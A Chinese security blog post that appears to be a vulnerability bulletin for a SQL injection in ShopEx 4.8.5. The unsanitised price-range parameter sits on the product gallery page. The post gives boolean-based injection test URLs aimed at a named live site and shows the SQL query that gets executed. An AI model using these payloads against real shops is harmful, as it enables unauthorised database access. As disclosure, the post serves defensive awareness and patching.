您的位置 » 首页 » 渗透测试 » 漏洞播报:shopex 4.8.5 产品筛选页面某处没有intval导致注入漏洞

漏洞播报:shopex 4.8.5 产品筛选页面某处没有intval导致注入漏洞

发表于4年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2014年01月01日 | 文章热度:8,960 次 全屏阅读

显示不全请点击全屏阅读

漏洞提供者:蘑菇街
对漏洞提供者表示感谢。
 
涉及版本:shopex-single-4.8.5.80603是否需要登录:无需登录
是否默认配置:是有无利用代码:code
漏洞细节:
产品筛选页面 价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt   9月2号的补丁

http://www.dynest.com/gallery–p,0,50%20and%200-0—1.html
没有产品

 

 
 
http://www.dynest.com/gallery–p,0,50%20and%201-0—1.html
返回正常
 
 
http://localhost/gallery–p,0,50(SQL)-0—1.html
实际执行的SQL为    select DISTINCT goods_id from sdb_products where price >= 0 AND price <= 50(SQL) AND disabled = ‘false’ AND marketable=’true’

Tags:

ShopEx漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3596/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)